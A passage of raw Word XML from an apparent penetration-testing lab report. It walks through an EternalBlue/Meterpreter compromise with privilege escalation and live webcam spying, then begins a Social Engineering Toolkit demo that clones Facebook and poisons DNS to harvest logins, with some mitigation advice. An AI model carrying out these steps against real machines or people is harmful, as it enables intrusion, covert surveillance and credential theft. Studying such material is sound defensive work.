    <w:p w14:paraId="65F7BA8B" w14:textId="5679CC0B" w:rsidR="00A63A10" w:rsidRDefault="00A63A10" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00A63A10">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command was issued for </w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> last time to confirm that the correct parameters had been set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356F4A96" w14:textId="098D33CA" w:rsidR="00A63A10" w:rsidRDefault="00A63A10" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470825F5" w14:textId="77777777" w:rsidR="00A94B2C" w:rsidRDefault="00291CB4" w:rsidP="00A94B2C">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A10EABD" wp14:editId="10FE6F5F">
            <wp:extent cx="3194050" cy="1695450"/>
            <wp:effectExtent l="0" t="0" r="635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94050" cy="1695450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="270FAC10" w14:textId="234933C1" w:rsidR="00CE58D8" w:rsidRDefault="00A94B2C" w:rsidP="00A94B2C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Show Options </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>With</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Payload Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4837371C" w14:textId="77777777" w:rsidR="00291CB4" w:rsidRDefault="00291CB4" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C8EAD00" w14:textId="6CC443B9" w:rsidR="00A63A10" w:rsidRDefault="00A63A10" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After the confirmation of the set parameters had been confirmed the final command syntax [exploit] was issued to start the attack against the target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>victims</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> device</w:t>
      </w:r>
      <w:r w:rsidR="00A94B2C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A94B2C" w:rsidRPr="00A94B2C">
        <w:t>Shown</w:t>
      </w:r>
      <w:r w:rsidR="00A94B2C" w:rsidRPr="00A94B2C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> in figure 6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C66928" w14:textId="11BD28FB" w:rsidR="00A63A10" w:rsidRDefault="00A63A10" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2604A6B9" w14:textId="77777777" w:rsidR="00A94B2C" w:rsidRDefault="00291CB4" w:rsidP="00A94B2C">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0760ABFE" wp14:editId="5AF766A9">
            <wp:extent cx="3204845" cy="42418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04845" cy="424180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B57ADB" w14:textId="51D4C747" w:rsidR="00A63A10" w:rsidRDefault="00A94B2C" w:rsidP="00A94B2C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Eternal Blue Exploiting Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32004871" w14:textId="5B32B195" w:rsidR="005659C6" w:rsidRDefault="00A63A10" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>After the Eternal Blue exploit</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">was successful the previously set reverse </w:t>
      </w:r>
      <w:r w:rsidR="005659C6">
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> meterpreter payload then appears to show the connection</w:t>
      </w:r>
      <w:r w:rsidR="005659C6">
        <w:t>. The ‘Meterpreter’ CLI is now utilised to execute commands within the remote targets machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D384B5" w14:textId="77777777" w:rsidR="009C62AF" w:rsidRDefault="009C62AF" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1A2323" w14:textId="60F6D506" w:rsidR="005659C6" w:rsidRDefault="005659C6" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The first command that needs to be executing within the meterpreter CLI is a post</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>exploitation script to escalate privileges called</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>;  ‘GET</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SYSTEM’. This command is simply executed using the </w:t>
      </w:r>
      <w:r w:rsidR="001D3EFE">
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidR="00E60D51">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="00E60D51" w:rsidRPr="00E60D51">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>[get system]</w:t>
      </w:r>
      <w:r w:rsidR="00E60D51">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A94B2C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> Shown in figure 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC0BFB5" w14:textId="77777777" w:rsidR="009C62AF" w:rsidRDefault="009C62AF" w:rsidP="00670FF6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46B95554" w14:textId="77777777" w:rsidR="00A94B2C" w:rsidRDefault="009C62AF" w:rsidP="00A94B2C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BC164C8" wp14:editId="6CD6BFAB">
            <wp:extent cx="3206115" cy="1581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06115" cy="158115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="561F6E7A" w14:textId="19BA3D4B" w:rsidR="00E60D51" w:rsidRDefault="00A94B2C" w:rsidP="00A94B2C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Escalate Privileges with [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EB806D" w14:textId="77777777" w:rsidR="009C62AF" w:rsidRDefault="009C62AF" w:rsidP="00E60D51">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A0E499" w14:textId="6BC3F2A0" w:rsidR="00E60D51" w:rsidRDefault="00E60D51" w:rsidP="00E60D51">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E60D51">
        <w:t>Once the systems privileges have been escalated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E60D51">
        <w:t>the attacker now has full control of the target machine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E60D51">
        <w:t xml:space="preserve"> for example </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="00E60D51">
        <w:t xml:space="preserve"> could install a </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00E60D51">
        <w:t>key logger</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00E60D51">
        <w:t xml:space="preserve"> and capture every keystroke the victim is entering i.e. password etc, files can be uploaded and download, plus the webcam can be activated to take screenshots or spy on the victim live via their own webcam</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and much more</w:t>
      </w:r>
      <w:r w:rsidRPr="00E60D51">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFB8EBA" w14:textId="509F6BA8" w:rsidR="00E60D51" w:rsidRDefault="00E60D51" w:rsidP="00E60D51">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598EF960" w14:textId="048673B5" w:rsidR="00EC662B" w:rsidRDefault="00E60D51" w:rsidP="005736B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To demonstrate a post</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exploitation attack, the webcam of </w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">he target machine was put into streaming mode by issuing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> syntax [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webcam_stream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] the webcam was then activated and the stream was played within the ‘Firefox’ browser shown in figure</w:t>
      </w:r>
      <w:r w:rsidR="00291CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A94B2C">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00291CB4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E77097" w14:textId="37FE4AB9" w:rsidR="00E60D51" w:rsidRDefault="00E60D51" w:rsidP="005736B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07D95515" w14:textId="77777777" w:rsidR="00A94B2C" w:rsidRDefault="00291CB4" w:rsidP="00A94B2C">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="507B492B" wp14:editId="6B1C5F52">
            <wp:extent cx="3200400" cy="24003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00400" cy="2400300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A1FFE0" w14:textId="78FDF815" w:rsidR="00291CB4" w:rsidRPr="00EC662B" w:rsidRDefault="00A94B2C" w:rsidP="00A94B2C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Webcam Stream Command and Live Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8293C8" w14:textId="2416ED9F" w:rsidR="00715C2D" w:rsidRDefault="00E60D51" w:rsidP="005736B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The ‘Eternal Blue’ exploit can be executed on any system that has Windows 7 or belo</w:t>
      </w:r>
      <w:r w:rsidR="00B45AFD">
        <w:t>w and Windows server 2012 and below installed as the parent OS. To mitigate against this attack Windows OS 10 should be installed as a client machine with all of the security updates regularly update and also Windows server 2016 or above that should also have security updates regular when Microsoft release</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00B45AFD">
        <w:t xml:space="preserve"> them.</w:t>
      </w:r>
      <w:r w:rsidR="000A6D08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEB824D" w14:textId="77777777" w:rsidR="00715C2D" w:rsidRDefault="00715C2D" w:rsidP="005736B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17DA9C32" w14:textId="7ACE0546" w:rsidR="0000147C" w:rsidRDefault="00715C2D" w:rsidP="005736B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="000A6D08">
        <w:t xml:space="preserve">he Information Gathering stage of </w:t>
      </w:r>
      <w:r>
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidR="000A6D08">
        <w:t xml:space="preserve"> internal LAN attack can also be easily mitigated by </w:t>
      </w:r>
      <w:r>
        <w:t>implementing</w:t>
      </w:r>
      <w:r w:rsidR="000A6D08">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">n extended </w:t>
      </w:r>
      <w:r w:rsidR="000A6D08">
        <w:t>Access Control List (</w:t>
      </w:r>
      <w:r>
        <w:t>ACL) within the internetworking devices; Routers, Switches and hardware firewalls that</w:t>
      </w:r>
      <w:r w:rsidR="000A6D08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>den</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Internet Control Message Protocol (ICMP) packets. ICMP is most commonly referred to as ping and LAN and WAN scanning tools such as Nmap, utilise ‘Ping’ sweeps to fingerprint a network in order to subsequently identify all </w:t>
      </w:r>
      <w:r w:rsidR="005F5CFC">
        <w:t>of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> devices that are attached to the LAN and/or WAN that a hacker is targeting that was previously demonstrated within this </w:t>
      </w:r>
      <w:r w:rsidR="005F5CFC">
        <w:t xml:space="preserve">penetration testing </w:t>
      </w:r>
      <w:r>
        <w:t>exercise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E16249" w14:textId="77777777" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="005736B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AB7D57" w14:textId="16CC4AFF" w:rsidR="00E862F2" w:rsidRDefault="00E862F2" w:rsidP="00E862F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E862F2">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Social Engineering </w:t>
      </w:r>
      <w:r w:rsidR="00380F50">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Website </w:t>
      </w:r>
      <w:r w:rsidRPr="00E862F2">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0565FF" w14:textId="0208D169" w:rsidR="00646AF7" w:rsidRDefault="00646AF7" w:rsidP="00380F50">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Social engineering attacks are utilised</w:t>
      </w:r>
      <w:r w:rsidR="00854445">
        <w:t xml:space="preserve"> to manipulate </w:t>
      </w:r>
      <w:r w:rsidR="007B1930">
        <w:t>people</w:t>
      </w:r>
      <w:r w:rsidR="00854445">
        <w:t xml:space="preserve"> into giving them their passwords and</w:t>
      </w:r>
      <w:r>
        <w:t>/or</w:t>
      </w:r>
      <w:r w:rsidR="00854445">
        <w:t xml:space="preserve"> installing malware onto </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">their </w:t>
      </w:r>
      <w:r w:rsidR="00854445">
        <w:t>devices</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. An example of this attack is called website </w:t>
      </w:r>
      <w:r>
        <w:t>spoofing, that is initialised within a LAN to all target machines that are connected to the same router as the attacker’s machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACFBDE8" w14:textId="77777777" w:rsidR="00646AF7" w:rsidRDefault="00646AF7" w:rsidP="00380F50">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3665E956" w14:textId="6FD8D082" w:rsidR="00380F50" w:rsidRDefault="00646AF7" w:rsidP="00380F50">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To demonstrate thi</w:t>
      </w:r>
      <w:r w:rsidR="0083115E">
        <w:t xml:space="preserve">s simple but effective </w:t>
      </w:r>
      <w:r>
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidR="00B56FCD">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a tool called; ‘Social Engineering Toolkit’</w:t>
      </w:r>
      <w:r w:rsidR="00B56FCD">
        <w:t xml:space="preserve"> (SET)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was utilised to clone the website; </w:t>
      </w:r>
      <w:r w:rsidRPr="00646AF7">
        <w:t>www.facebook.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="00F475B8">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> then hosted on the attacking machines ‘Apache2’ web</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>server located on the local attackers Kali Linux machine.  The poisoning of the Domain Name Service (DNS) IP to Domain address</w:t>
      </w:r>
      <w:r w:rsidR="00F475B8">
        <w:t xml:space="preserve"> mapping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> database (AAA records) within the router will also be executed within the same attack</w:t>
      </w:r>
      <w:r w:rsidR="00F475B8">
        <w:t xml:space="preserve"> to redirect all of the clients to the </w:t>
      </w:r>
      <w:r w:rsidR="002973D9">
        <w:t>attacker’s</w:t>
      </w:r>
      <w:r w:rsidR="00F475B8">
        <w:t xml:space="preserve"> fake ‘Facebook’ website on their host machine to steal their username and password,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> this</w:t>
      </w:r>
      <w:r w:rsidR="00F475B8">
        <w:t xml:space="preserve"> part of the </w:t>
      </w:r>
      <w:r w:rsidR="00010CBB">
        <w:t>attack is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> called DNS poisoning</w:t>
      </w:r>
      <w:r w:rsidR="00975C09">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A9392C">
        <w:t xml:space="preserve"> Once the victim</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00A9392C">
        <w:t>s credentials have been harvested the SET tool then automatically redirects them to the correct website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F5C0A0" w14:textId="45EB88BA" w:rsidR="005B0C74" w:rsidRDefault="005B0C74" w:rsidP="00380F50">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE016D0" w14:textId="007E454E" w:rsidR="003A040D" w:rsidRDefault="005B0C74" w:rsidP="003A040D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To start the SET </w:t>
      </w:r>
      <w:r w:rsidR="003A040D">
        <w:t>tool, the syntax; [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A040D">
        <w:t>settoolkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A040D">
        <w:t>] was executed within the Kali Linux CLI.</w:t>
      </w:r>
      <w:r w:rsidR="003A040D" w:rsidRPr="003A040D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A040D">
        <w:t>After the tool started, an interactive user</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="003738D1">
        <w:t>friendly menu</w:t>
      </w:r>
      <w:r w:rsidR="003A040D">
        <w:t xml:space="preserve"> appears with various options for differen</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="003A040D">
        <w:t xml:space="preserve"> social engineering attacks shown in </w:t>
      </w:r>
      <w:r w:rsidR="003A040D" w:rsidRPr="003A040D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00ED555E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E699022" w14:textId="59F0E66F" w:rsidR="003A040D" w:rsidRDefault="003A040D" w:rsidP="00380F50">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384CEB3A" w14:textId="77777777" w:rsidR="00ED555E" w:rsidRDefault="009C62AF" w:rsidP="00ED555E">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E31505C" wp14:editId="787B1793">
            <wp:extent cx="3200400" cy="1725114"/>
            <wp:effectExtent l="0" t="0" r="0"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t="56400"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200400" cy="1725114"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C310C1D" w14:textId="2B279D58" w:rsidR="009C62AF" w:rsidRDefault="00ED555E" w:rsidP="00ED555E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: SET Tool Splash Screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEAB5A3" w14:textId="643065D3" w:rsidR="003A040D" w:rsidRDefault="003A040D" w:rsidP="00380F50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Option one was selected; </w:t>
      </w:r>
      <w:r w:rsidRPr="003A040D">
        <w:t>social engineering attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, then within the second menu that appeared option two was selected; Website Attack Vectors </w:t>
      </w:r>
